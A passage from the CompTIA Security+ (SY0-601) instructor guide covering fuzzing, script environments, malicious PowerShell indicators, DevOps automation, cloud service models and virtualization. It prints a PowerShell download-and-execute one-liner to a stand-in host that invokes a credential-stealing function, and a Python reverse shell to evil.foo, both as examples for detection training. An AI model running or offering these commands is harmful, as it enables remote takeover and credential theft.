Web Application Security Risks or injection vulnerabilities generally. NIST maintains a
list of source code analyzers and their key features (samate.nist.gov/index.php/Source_
Code_Security_Analyzers.html).
Human analysis of software source code is described as a manual code review. It is
important that the code be reviewed by developers (peers) other than the original
coders to try to identify oversights, mistaken assumptions, or a lack of knowledge or
experience. It is important to establish a collaborative environment in which reviews
can take place effectively.
Static code review techniques will not reveal vulnerabilities that might exist in the Dynamic Code
runtime environment, such as exposure to race conditions or unexpected user input. Analysis
Dynamic analysis means that the application is tested under "real world" conditions
using a staging environment.
Fuzzing is a means of testing that an application's input validation routines work
well. Fuzzing means that the test or vulnerability scanner generates large amounts
of deliberately invalid and/or random input and records the responses made by
the application. This is a form of "stress testing" that can reveal how robust the
application is. There are generally three types of fuzzers, representing different ways of
injecting manipulated input into the application:
• Application UI—identify input streams accepted by the application, such as input
boxes, command line switches, or import/export functions.
• File format—attempt to open files whose format has been manipulated, perhaps
manipulating specific features of the file.
Fuzzers are also distinguished by the way in which they craft each input (or test
case). The fuzzer may use semi-random input (dumb fuzzer) or might craft specific
input based around known exploit vectors, such as escaped command sequences or
character literals, or by mutating intercepted inputs.
Associated with fuzzing is the concept of stress testing an application to see how an
application performs under extreme performance or usage scenarios.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
388 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Finally, the fuzzer needs some means of detecting an application crash and recording
which input sequence generated the crash.
Loading a list of strings for the payload of a fuzzing test in Burp Suite.
(Screenshot Burp Suite portswigger.net/burp.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 389
Review Activity:
Secure Coding Practices
Answer the following questions:
Input validation provides some mitigation against this type of input being passed to an
application via a user form. Output encoding could provide another layer of protection
by checking that the query that the script passes to the database is safe.
Output encoding ensures that strings are made safe for the context they are being
passed to, such as when a JavaScript variable provides output to render as HTML. Safe
means that the string does not contain unauthorized syntax elements, such as script
tags.
3. You are discussing execution and validation security for DOM scripting with
the web team. A junior team member wants to know if this relates to client-
side or server-side code. What is your response?
The document object model (DOM) is the means by which a script (JavaScript) can
change the way a page is rendered. As this change is rendered by the browser, it is
client-side code.
A default error message might reveal platform information and the workings of the
code to an attacker.
A software development kit (SDK) contains tools and code examples released by a
vendor to make developing applications within a particular environment (framework,
programming language, OS, and so on) easier. Any element in the SDK could contain
vulnerabilities that could then be transferred to the developer's code or application.
7. What type of dynamic testing tool would you use to check input validation
on a web form?
A fuzzer can be used to submit known unsafe strings and randomized input to test
whether they are made safe by input validation or not.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
390 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 14D
Implement Secure Script Environments
Show Slide(s) A scripting language like Python is a general purpose or procedural language. It can be
adapted to perform many tasks. A domain-specific language (DSL) performs a particular
Python Script task, such as regex string parsing. Orchestration manages multiple automation scripts and
Environment configuration data to provision a service.
Teaching
Tip All coding languages have a specific syntax that constrains the way sections of code are
Given the time laid out in blocks and the standard statements that are available, such as branching
allowed, just try to and looping constructions.
ensure that students
can identify Python
code and interpret Python Script Environment
basic code structures,
such as function Python is a popular language for implementing all kinds of development projects,
definitions, function including automation tools and security tools, as well as malicious scripts (python.org).
calls, and logical tests. Where many languages use brackets to denote blocks of code, Python uses indentation
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 391
(4 spaces per level, by convention). Any statement that starts a block is delimited by
a colon. Python is case-sensitive; for example, the variable user cannot be referred
to by the label User or USER. Comment lines are marked by the # character. You can
view inline help on modules, functions, and keywords using the help statement. For
example, the following command shows help for the print function: help(print)
Variables
Python uses the = operator to assign a name to a variable. Names are not declared
with a data type, such as string or integer, but Python is strongly typed, meaning that
you cannot multiply an integer variable by a string variable, for instance. String literals
can be delimited using single or double quotes.
Functions
Functions are used to produce modular, reusable code. A function takes some
arguments as parameters, performs some processing, and typically returns some
output. When creating a script, you will use some functions from Python's modules and
define your own functions. A function is defined using the following indentation syntax:
def fullname(name,surname):
return name + " " + surname
#This ends the function definition
#The next line calls the function to set a variable
greeting = 'Hello ' + fullname('World', '')
print(greeting)
Operator Operation
== Is equal to
!= Is not equal to
< Is less than
> Is greater than
<= Is less than or equal to
>= Is greater than or equal to
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
392 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Modules
A Python module is a library of functions for accomplishing standard tasks, such
as opening a network socket or interacting with an operating system's API. One of
the perceived strengths of Python is the huge number of modules. For example,
the os module contains functions to interact with the operating system, while the
socket module handles network connections and the url module opens and parses
resource addresses. Various extension modules allow a Python script to interact with
Windows APIs.
The presence of two malicious libraries within a Python repository illustrates the potential
risks of third-party code (https://www.zdnet.com/article/two-malicious-python-libraries-
removed-from-pypi/).
Execution
Python is an interpreted language, executed within the context of a binary Python
process. In Windows, a Python script (.py) can be called via python.exe (with a
command window) or pythonw.exe (with no command window). A Python script can
also be compiled to a standalone Windows executable using the py2exe extension. This
executable can be digitally signed.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 393
Modules
PowerShell can also be used with a large number of modules, which are added to a
script using the Import-Module cmdlet.
Execution control is the process of determining what additional software or scripts Execution Control
may be installed or run on a host beyond its baseline.
Teaching
Allow and Block Lists Tip
Execution control can be implemented as either an allow list or a block list. Terminology such as
black/whitelist is non-
• Allow list is a highly restrictive policy that means only running authorized processes inclusive and is being
and scripts. Allowing only specific applications that have been added to a list will replaced by neutral
terms (block/allow
inevitably hamper users at some point and increase support time and costs. For
lists).
example, a user might need to install a conferencing application at short notice.
• Block list is a permissive policy that only prevents execution of listed processes
and scripts. It is vulnerable to software that has not previously been identified as
malicious (or capable of or vulnerable to malicious use).
These concepts can also be referred to as whitelists and blacklists, but most sources now
deprecate this type of non-inclusive terminology.
Code Signing
Code signing is the principal means of proving the authenticity and integrity of code
(an executable or a script). The developer creates a cryptographic hash of the file then
signs the hash using his or her private key. The program is shipped with a copy of the
developer's code signing certificate, which contains a public key that the destination
computer uses to read and verify the signature. The OS then prompts the user to
choose whether to accept the signature and run the program.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
394 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In Windows, execution of PowerShell scripts can be inhibited by the execution policy. Note
that the execution policy is not an access control mechanism. It can be bypassed in any
number of different ways. WDAC is a robust mechanism for restricting use of potentially
dangerous code, such as malicious PowerShell.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 395
There are numerous exploit frameworks to leverage PowerShell functionality, such as PowerShell Malicious
PowerShell Empire, PowerSploit, Metasploit, and Mimikatz. Some suspicious indicators Indicators
for PowerShell execution include the following:
Teaching
• Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod, New-
Tip
Service, Create-Thread, Start-Process, and New-Object can indicate an attempt to
Aim to give students
run some type of binary shellcode. This is particularly suspicious if combined with
basic recognition
a DownloadString or DownloadFile argument. One complication is that cmdlets can of common attack
be shortened, assisting obfuscation. For example, Invoke-Expression can be run frameworks and
using IEX. potentially suspicious
cmdlets and usages.
powershell.exe "IEX (New-Object Net.WebClient).
DownloadString('https://badsite.foo/DoEvil.ps1');
Do-Evil -StealCreds"
• Bypassing execution policy can also act as an indicator. The PowerShell code may be
called as a Base64 encoded string (-enc argument) or may use the -noprofile
or -ExecutionPolicy bypass arguments.
• Using system calls to the Windows API might indicate an attempt to inject a DLL
or perform process hollowing, where the malicious code takes over a legitimate
process:
[Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\
Temp\doevil.dll")
• Using another type of script to execute the PowerShell is also suspicious. For
example, the attacker might use JavaScript code embedded in a PDF to launch
PowerShell via a vulnerable reader app.
The big problem with PowerShell indicators is distinguishing them from legitimate
behavior. The following techniques can be used to assist with this:
• Use group policy to restrict execution of PowerShell to trusted accounts and hosts.
• Use group policy execution control to run scripts only from trusted locations.
• Prevent the use of old PowerShell versions to mitigate the use of a downgrade
attack to bypass access controls.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
396 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A very common vector for attacking Linux hosts is to use an exploit to install a web
shell as a backdoor (acunetix.com/blog/articles/introduction-web-shells-part-1). Typical
code to implement a reverse shell (connecting out to the machine at evil.foo on port
4444) is as follows:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("evil.foo",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")'
The os.dup2 statements redirect the terminal's data streams stdin (0), stdout (1),
and stderr (2) to the socket object (s). The pty module provides a library of functions
for managing a pseudo-terminal, in this case starting the shell process at /bin/sh.
The code to implement a shell can be obfuscated in numerous ways. One way to
identify malicious scripts trying to match code samples is to scan the file system against
a configuration baseline, either using file integrity monitoring or use of the Linux diff
command.
Show Slide(s)
A common exploit for a vulnerable web server is to upload a cryptominer, misusing
Macros and Visual the server's CPU resources to try to obtain new cryptocurrency. You can use Linux
Basic for Applications utilities such as top and free to diagnose excessive CPU and memory resource
(VBA) consumption by such malware.
Teaching This F5 white paper describes the use of Bash and Python attack tools (f5.com/labs/articles/
Tip threat-intelligence/attackers-use-new--sophisticated-ways-to-install-cryptominers).
Students need to
look out for macros
or document scripts
that download binary Macros and Visual Basic for Applications (VBA)
data or try to execute
scripts in other A document macro is a sequence of actions performed in the context of a word
languages. processor, spreadsheet, or presentation file. While the user may be able to record
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 397
macro steps using the GUI, ultimately macros are coded in a scripting language.
Microsoft Office uses the Visual Basic for Applications (VBA) language, while PDF
documents use JavaScript. Microsoft Office document macros can be inspected
using ALT+F11. Other vendors and open-source software also implement macro
functionality, using languages such as Basic or Python.
A malicious actor will try to use a macro-enabled document to execute arbitrary
code. For example, a Word document could be the vector for executing a malicious
PowerShell script. Macros are disabled by default in Office, but the attacker may be
able to use a social engineering attack to get the user to change the policy.
With PDF, the JavaScript might be embedded within the document and designed to
exploit a known vulnerability in the reader software to execute without authorization
(sentinelone.com/blog/malicious-pdfs-revealing-techniques-behind-attacks).
A man-in-the-browser (MitB) attack is a specific type of on-path attack where the web Man-in-the-Browser
browser is compromised. Depending on the level of privilege obtained, the attacker Attack
may be able to inspect session cookies, certificates, and data, change browser settings,
perform redirection, and inject code.
A MitB attack may be accomplished by installing malicious plug-ins or scripts or
intercepting calls between the browser process and DLLs (attack.mitre.org/techniques/
T1185). The Browser Exploitation Framework (BeEF) (beefproject.com) is one well
known MitB tool. There are various vulnerability exploit kits that can be installed to a
website to actively try to exploit vulnerabilities in clients browsing the site (trendmicro.
com/vinfo/ie/security/definition/exploit-kit). These kits may either be installed to a
legitimate site without the owner's knowledge (by compromising access control on
the web server) and load in an iFrame (invisible to the user), or the attacker may use
phishing/social engineering techniques to trick users into visiting the site.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
398 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Script Environments
Answer the following questions:
1. You have been asked to investigate a web server for possible intrusion. You
identify a script with the following code. What language is the code in and
does it seem likely to be malicious?
2. Which tools can you use to restrict the use of PowerShell on Windows
10 clients?
There are various group policy-based mechanisms, but for Windows 10, the Windows
Defender Application Control (WDAC) framework provides the most powerful toolset
for execution control policies.
The Local Security Authority Subsystem Service (LSASS) enforces security policies,
including authentication and password changes. Consequently, it holds hashes of user
passwords in memory. Attacks on lsass.exe are typically credential dumping to steal
those hashes.
No. While Visual Basic for Applications (VBA) can only be used with Microsoft Office,
other types of document can contain embedded scripts, such as JavaScript in PDFs.
Other Office suites, such as OpenOffice and LibreOffice, use scripting languages for
macros too.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 399
Topic 14E
Summarize Deployment and
Automation Concepts
A DevSecOps culture gives project teams a broad base of development, security, Show Slide(s)
and operations expertise and experience. This promotes an environment in which
security tasks make increased use of automation. Automation is the completion of
Application
an administrative task without human intervention. Task automation steps may be Development,
configurable through a GUI control panel, via a command line, or via an API called Deployment, and
by scripts. Tasks can be automated to provision resources, add accounts, assign Automation
permissions, perform incident detection and response, and any number of other
network security tasks.
Manual configuration introduces a lot of scope for making errors. A technician may be
unsure of best practice, or there may be a lack of documentation. Over time, this leads to
many small discrepancies in the way instances and services are configured. These small
discrepancies can become big problems when it comes to maintaining, updating, and
securing IT and cloud infrastructure. Automation provides better scalability and elasticity:
• Scalability means that the costs involved in supplying the service to more users are
linear. For example, if the number of users doubles in a scalable system, the costs to Show Slide(s)
maintain the same level of service would also double (or less than double). If costs
more than double, the system is less scalable. Secure Application
Development
• Elasticity refers to the system's ability to handle changes on demand in real time. Environments
A system with high elasticity will not experience loss of service or performance if
demand suddenly doubles (or triples, or quadruples). Conversely, it may be important Teaching
for the system to be able to reduce costs when demand is low. Elasticity is a common Tip
selling point for cloud services. Instead of running a cloud resource for 24 hours a day, This syllabus revision
7 days a week, that resource can diminish in power or shut down completely when has removed waterfall
demand for that resource is low. When demand picks up again, the resource will grow and Agile as explicit
in power to the level required. This results in cost-effective operations. content examples.
We need to mention
them to explain
Secure Application Development Environments "continuous," but
students should not
Security must be a key component of the application or automation design process. need to know the
development life cycle
Even a simple form and script combination can make a web server vulnerable if the phases in anything
script is not well written. A software development life cycle (SDLC) divides the other than very
creation and maintenance of software into discrete phases. There are two principal general terms.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
400 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
SDLCs: the waterfall model and Agile development. Both these models stress
the importance of requirements analysis and quality processes to the success of
development projects.
Development Environments
To meet the demands of the life cycle model and quality assurance, code is normally
passed through several different environments:
• Development—the code will be hosted on a secure server. Each developer will check
out a portion of code for editing on his or her local machine. The local machine will
normally be configured with a sandbox for local testing. This ensures that whatever
other processes are being run locally do not interfere with or compromise the
application being developed.
• Test/integration—in this environment, code from multiple developers is merged
to a single master copy and subjected to basic unit and functional tests (either
automated or by human testers). These tests aim to ensure that the code builds
correctly and fulfills the functions required by the design.
• Staging—this is a mirror of the production environment but may use test or sample
data and will have additional access controls so that it is only accessible to test
users. Testing at this stage will focus more on usability and performance.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 401
The use of development life cycle models and QA processes extends past development Provisioning,
and testing to the deployment and maintenance of an application or script-based Deprovisioning, and
automation task. Version Control
Provisioning
Provisioning is the process of deploying an application to the target environment,
such as enterprise desktops, mobile devices, or cloud infrastructure. An enterprise
provisioning manager might assemble multiple applications in a package. Alternatively,
the OS and applications might be defined as a single instance for deployment on a
virtualized platform. The provisioning process must account for changes to any of
these applications so that packages or instances are updated with the latest version.
Deprovisioning
Deprovisioning is the process of removing an application from packages or instances.
This might be necessary if software has to be completely rewritten or no longer
satisfies its purpose. As well as removing the application itself, it is also important to
make appropriate environment changes to remove any configurations (such as open
firewall ports) that were made just to support that application.
Version Control
Version control is an ID system for each iteration of a software product. Most version
control numbers represent both the version, as made known to the customer or end
user, and internal build numbers for use in the development process. Version control
supports the change management process for software development projects. Most
software development environments use a build server to maintain a repository of
previous versions of the source code. When a developer commits new or changed
code to the repository, the new source code is tagged with an updated version number Show Slide(s)
and the old version archived. This allows changes to be rolled back if a problem is
discovered.
Automation/Scripting
Release Paradigms
Automation/Scripting Release Paradigms
Teaching
Coding projects are managed using different life cycle models. The waterfall model Tip
software development life cycle (SDLC) is an older paradigm that focuses on the Make sure students
successful completion of monolithic projects that progress from stage-to-stage. The can distinguish these
more recent Agile paradigm uses iterative processes to release well-tested code phases.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
402 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
in smaller blocks or units. In this model, development and provisioning tasks are
conceived as continuous.
Continuous Integration
Continuous integration (CI) is the principle that developers should commit and test
updates often—every day or sometimes even more frequently. This is designed to
reduce the chances of two developers spending time on code changes that are later
found to conflict with one another. CI aims to detect and resolve these conflicts early,
as it is easier to diagnose one or two conflicts or build errors than it is to diagnose the
causes of tens of them. For effective CI, it is important to use an automated test suite
to validate each build quickly.
Continuous Delivery
Where CI is about managing code in development, continuous delivery is about
testing all of the infrastructure that supports the app, including networking, database
functionality, client software, and so on.
Continuous Deployment
Where continuous delivery tests that an app version and its supporting infrastructure
are ready for production, continuous deployment is the separate process of actually
making changes to the production environment to support the new app version.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 403
ensure that they are recovery ready. You can also automate the courses of action that
a monitoring system takes, like configuring an IPS to automatically block traffic that
it deems suspicious. This sort of capability is provided by security orchestration and
response (SOAR) management software.
Continuous Validation
An application model is a statement of the requirements driving the software
development project. The requirements model is tested using processes of verification
and validation (V&V):
• Verification is a compliance testing process to ensure that the product or system
meets its design goals.
With the continuous paradigm, feedback from delivery and deployment must be
monitored and evaluated to ensure that the design goals continue to meet user and
security requirements. The monitoring and validation processes must also ensure that
there is no drift from the secure configuration baseline.
An application's runtime environment will use one of two approaches for execution on Software Diversity
a host system:
• Compiled code is converted to binary machine language that can run independently
on the target OS.
Software diversity can refer to obfuscation techniques to make code difficult to detect
as malicious. This is widely used by threat actors in the form of shellcode compilers
to avoid signature detection, such as the venerable Shikata Ga Nai (fireeye.com/blog/
threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html). This can
be used as a defensive technique. Obfuscating API methods and automation code
makes it harder for a threat actor to reverse engineer and analyze the code to discover
weaknesses.
There is also general research interest in security by diversity. This works on the
principle that attacks are harder to develop against non-standard environments. A
monoculture environment, such as a Windows domain network, presents a fairly
predictable attack surface with plenty of commodity malware tools available to exploit
misconfigurations. Using a wide range of development tools and OS/application
vendors and versions can make attack strategies harder to research. As with security
by obscurity, this will not defeat a targeted attack, but it can partially mitigate risks
from less motivated threat actors, who will simply move to the next, easier target.
On the other hand, this sort of complexity will tend to lead to greater incidence of
configuration errors as technicians and developers struggle to master unfamiliar
technologies.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
404 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Deployment and Automation Concepts
Answer the following questions:
Continuous deployment.
The compiler can apply obfuscation routines to make the code difficult for a threat
actor to reverse engineer and analyze for vulnerabilities.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 405
Lesson 14
Summary
You should be able to identify and classify application attacks and summarize Teaching
development and coding best practices. Tip
Check that students
Guidelines for Secure Application Development are confident about
the content that has
been covered. If there
Follow these guidelines for initiating or improving application development projects:
is time, revisit any
• Train developers on secure coding techniques to provide specific mitigation content examples that
against attacks: they have questions
about. If you have
used all the available
• Overflow, race condition, and DLL/driver manipulation attacks that exploit
time for this lesson
vulnerable code. block, note the issues,
and schedule time for
• Injection attacks (XSS, SQL, XML, LDAP, shellcode) that exploit lack of input a review later in the
validation. course.
• Replay and request forgery attacks that exploit lack of secure authentication and
authorization mechanisms.
• Review and test code using static and dynamic analysis, paying particular attention
to input validation, output encoding, error handling, and data exposure.
• Document use of approved coding languages and launch locations, ideally with code
signing, to make malicious code easier to detect.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 15
Implementing Secure Cloud Solutions
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
408 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 15A
Summarize Secure Cloud and
Virtualization Services
This type of cloud could be on-premise or offsite relative to the other business
units. An onsite link can obviously deliver better performance and is less likely to
be subject to outages (loss of an Internet link, for instance). On the other hand, a
dedicated offsite facility may provide better shared access for multiple users in
different locations.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 409
There will also be cloud computing solutions that implement some sort of hybrid
public/private/community/hosted/onsite/offsite solution. For example, a travel
organization may run a sales website for most of the year using a private cloud
but break out the solution to a public cloud at times when much higher utilization
is forecast.
Flexibility is a key advantage of cloud computing, but the implications for data risk
must be well understood when moving data between private and public storage
environments.
As well as the ownership model (public, private, hybrid, or community), cloud services Cloud Service Models
are often differentiated on the level of complexity and pre-configuration provided.
These models are referred to as something or anything as a service (XaaS). The three
most common implementations are infrastructure, software, and platform.
Infrastructure as a Service
Infrastructure as a service (IaaS) is a means of provisioning IT resources such as
servers, load balancers, and storage area network (SAN) components quickly. Rather
than purchase these components and the Internet links they require, you rent them on
an as-needed basis from the service provider's data center. Examples include Amazon
Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft Azure Virtual Machines
(azure.microsoft.com/services/virtual-machines), Oracle Cloud (oracle.com/cloud), and
OpenStack (openstack.org).
Software as a Service
Software as a service (SaaS) is a different model of provisioning software
applications. Rather than purchasing software licenses for a given number of seats,
a business would access software hosted on a supplier's servers on a pay-as-you-
go or lease arrangement (on-demand). Virtual infrastructure allows developers to
provision on-demand applications much more quickly than previously. The applications
can be developed and tested in the cloud without the need to test and deploy on
client computers. Examples include Microsoft Office 365 (microsoft.com/en-us/
microsoft-365/enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite.
google.com).
Platform as a Service
Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS.
A typical PaaS solution would provide servers and storage network infrastructure
(as per IaaS) but also provide a multi-tier web application/database platform on top.
This platform could be based on Oracle or MS SQL or PHP and MySQL. Examples
include Oracle Database (oracle.com/database), Microsoft Azure SQL Database (azure.
microsoft.com/services/sql-database), and Google App Engine (cloud.google.com/
appengine).
As distinct from SaaS though, this platform would not be configured to actually
do anything. Your own developers would have to create the software (the CRM or
e‑commerce application) that runs using the platform. The service provider would
be responsible for the integrity and availability of the platform components, but you
would be responsible for the security of the application you created on the platform.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
410 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Dashboard for Amazon Web Services Elastic Compute Cloud (EC2) IaaS/PaaS.
(Screenshot used with permission from Amazon.com.)
Note that this matrix identifies generic responsibilities only. Specific terms must be set out in
a contract and service level agreement (SLA) with the CSP.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 411
The breadth of technologies requiring specialist security knowledge and configuration Security as a Service
makes it likely that companies will need to depend on third-party support at some
point. You can classify such support in three general "tiers":
• Consultants—the experience and perspective of a third-party professional can
be hugely useful in improving security awareness and capabilities in any type of
organization (small to large). Consultants could be used for "big picture" framework
analysis and alignment or for more specific or product-focused projects (pen
testing, SIEM rollout, and so on). It is also fairly simple to control costs when using
consultants if they are used to develop capabilities rather than implement them.
Where consultants come to "own" the security function, it can be difficult to change
or sever the relationship.
Virtualization means that multiple operating systems can be installed and run Virtualization
simultaneously on a single computer. A virtual platform requires at least three Technologies and
components: Hypervisor Types
• Host hardware—the platform that will host the virtual environment. Optionally,
Teaching
there may be multiple hosts networked together.
Tip
• Hypervisor/Virtual Machine Monitor (VMM)—manages the virtual machine This is a recap of the
environment and facilitates interaction with the computer hardware and network. basics. Hopefully
students should know
• Guest operating systems, Virtual Machines (VM), or instances—operating systems this material already.
installed under the virtual environment.
One basic distinction that can be made between virtual platforms is between host
and bare metal methods of interacting with the host hardware. In a guest OS (or
host-based) system, the hypervisor application (known as a Type II hypervisor) is itself
installed onto a host operating system. Examples of host-based hypervisors include
VMware Workstation, Oracle Virtual Box, and Parallels Workstation. The hypervisor
software must support the host OS.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
412 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A bare metal virtual platform means that the hypervisor (Type I hypervisor) is installed
directly onto the computer and manages access to the host hardware without going
through a host OS. Examples include VMware ESXi Server, Microsoft's Hyper-V, and
Citrix's XEN Server. The hardware needs only support the base system requirements
for the hypervisor plus resources for the type and number of guest OSes that will
be installed.
Type I "bare metal" hypervisor—The hypervisor is installed directly on the host hardware along with
a management application, then VMs are installed within the hypervisor.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 413
(Microsoft Remote Desktop or Citrix ICA, for instance). The thin client has to find the
correct image and use an appropriate authentication mechanism. There may be a 1:1
mapping based on machine name or IP address or the process of finding an image may
be handled by a connection broker.
All application processing and data storage in the virtual desktop environment
(VDE) or workspace is performed by the server. The thin client computer must only
be powerful enough to display the screen image, play audio, and transfer mouse, key
commands and video, and audio information over the network. All data is stored on
the server, so it is easier to back up and the desktop VMs are easier to support and
troubleshoot. They are better "locked" against unsecure user practices because any
changes to the VM can easily be overwritten from the template image. With VDI, it is
also easier for a company to completely offload their IT infrastructure to a third-party
services company.
The main disadvantage is that in the event of a failure in the server and network
infrastructure, users have no local processing ability, so downtime events may be more
costly in terms of lost productivity.
Application virtualization is a more limited type of VDI. Rather than run the whole Application
client desktop as a virtual platform, the client either accesses an application hosted on Virtualization
a server or streams the application from the server to the client for local processing. and Container
Most application virtualization solutions are based on Citrix XenApp (formerly Virtualization
MetaFrame/Presentation Server), though Microsoft has developed an App-V product
with its Windows Server range and VMware has the ThinApp product. These solution
types are now often used with HTML5 remote desktop apps, referred to as "clientless"
because users can access them through ordinary web browser software.
Application cell/container virtualization dispenses with the idea of a hypervisor and
instead enforces resource separation at the operating system level. The OS defines
isolated "cells" for each user instance to run in. Each cell or container is allocated CPU
and memory resources, but the processes all run through the native OS kernel. These
containers may run slightly different OS distributions but cannot run guest OSes of
different types (you could not run Windows or Ubuntu in a RedHat Linux container, for
instance). Alternatively, the containers might run separate application processes, in
which case the variables and libraries required by the application process are added to
the container.
One of the best-known container virtualization products is Docker (docker.com).
Containerization underpins many cloud services. In particular it supports microservices
and serverless architecture. Containerization is also being widely used to implement
corporate workspaces on mobile devices.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
414 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
Teaching
Tip VM Escape Protection
One of the main
concerns is that VM escaping refers to malware running on a guest OS jumping to another guest
the technology or to the host. To do this, the malware must identify that it is running in a virtual
underpinning the environment, which is usually simple to do. One means of doing so is through a timing
virtual platform attack. The classic timing attack is to send multiple usernames to an authentication
will not be well server and measure the server response times. An invalid username will usually
understood by
be rejected very quickly, but a valid one will take longer (while the authentication
developers and
administrators. server checks the password). This allows the attacker to harvest valid usernames.
Details of the Malware can use a timing attack within a guest OS to detect whether it is running in
implementation may a VM (certain operations may take a distinct amount of time compared to a "real"
also be proprietary. environment). There are numerous other "signatures" that an attacker could use to
This might be a detect the presence of virtualized system hardware. The next step in VM escaping is for
good opportunity to
discuss Meltdown and
the attacker to compromise the hypervisor. Security researchers have been focusing on
Spectre (csoonline. this type of exploit and several vulnerabilities have been found in popular hypervisors.
com/article/3247868/
One serious implication of VM escaping is where virtualization is used for hosted
spectre-and-
meltdown-explained- applications. If you have a hosted web server, apart from trusting the hosting provider
what-they-are-how- with your data, you have no idea what other applications might be running in other
they-work-whats- customers' VMs. For example, consider a scenario where you have an e-commerce web
at-risk.html). These server installed on a virtual server leased from an ISP. If a third-party installs another
vulnerabilities guest OS with malware that can subvert the virtual server's hypervisor, they might
aren't specific to
hypervisors, but
be able to gain access to your server or to data held in the memory of the physical
they are particularly server. Having compromised the hypervisor, they could make a copy of your server
serious in a virtualized image and download it to any location. This would allow the attacker to steal any
environment. You can unencrypted data held on the e-commerce server. Even worse, it could conceivably
also point students to allow them to steal encrypted data, by obtaining the private encryption keys stored on
the following analysis the server or by sniffing unencrypted data or a data encryption key from the physical
of a typical VM escape
vulnerability: mcafee.
server's memory.
com/blogs/other- It is imperative to monitor security bulletins for the hypervisor software that you
blogs/mcafee-labs/
operate and to install patches and updates promptly. You should also design the
analyzing-patch-of-
a-virtual-machine- VM architecture carefully so that the placement of VMs running different types of
escape-on-vmware. applications with different security requirements does not raise unnecessary risks.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 415
For example, when considering security zones such as a DMZ, VMs providing front-end
and middleware/back-end services should be separated to different physical hosts.
This reduces the security implications of a VM escaping attack on a host in the DMZ
(which will generally be more vulnerable to such attacks).
Isolating VMs in different zones on separate hardware—This should reduce the impact
of a VM escaping attack. (Images © 123RF.com.)
As well as securing the hypervisor, you must also treat each VM as you would any VM Sprawl Avoidance
other network host. This means using security policies and controls to ensure the
confidentiality, integrity, and availability of all data and services relying on host
virtualization.
